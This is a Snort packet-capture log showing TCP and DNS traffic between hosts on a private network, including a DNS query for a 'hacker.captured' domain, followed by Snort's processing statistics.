=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.930542 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13903 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xA47FA4E0 Ack: 0xA7F89C21 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346792 136972687 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.930215 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48804 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C21 Ack: 0xA47FA4E1 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972688 78346792 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.931195 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48805 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xA7F89C21 Ack: 0xA47FA4E1 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972688 78346792 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.931219 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13904 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47FA4E1 Ack: 0xA7F89C22 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346793 136972688 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:10.084786 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x62 192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18298 IpLen:20 DgmLen:84 Len: 64 5E D0 01 00 00 01 00 00 00 00 00 00 03 77 77 77 ^............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 03 76 6D 78 06 68 6B 6E 74 65 63 03 .com.vmx.hkntec. 6E 65 74 00 00 01 00 01 net..... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:10.086192 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x62 192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18299 IpLen:20 DgmLen:84 Len: 64 5E D0 01 00 00 01 00 00 00 00 00 00 03 77 77 77 ^............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 03 76 6D 78 06 68 6B 6E 74 65 63 03 .com.vmx.hkntec. 6E 65 74 00 00 01 00 01 net.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
===============================================================================
Snort processed 51 packets.
Breakdown by protocol:                Action Stats:
    TCP: 44         (86.275%)         ALERTS: 0
    UDP: 7          (13.725%)         LOGGED: 0
   ICMP: 0          (0.000%)          PASSED: 0
    ARP: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)
===============================================================================
Fragmentation Stats:
Fragmented IP Packets: 0          (0.000%)
   Rebuilt IP Packets: 0
   Frag elements used: 0
Discarded(incomplete): 0
   Discarded(timeout): 0
===============================================================================
TCP Stream Reassembly Stats:
     TCP Packets Used: 0          (0.000%)
Reconstructed Packets: 0          (0.000%)
Streams Reconstructed: 0
===============================================================================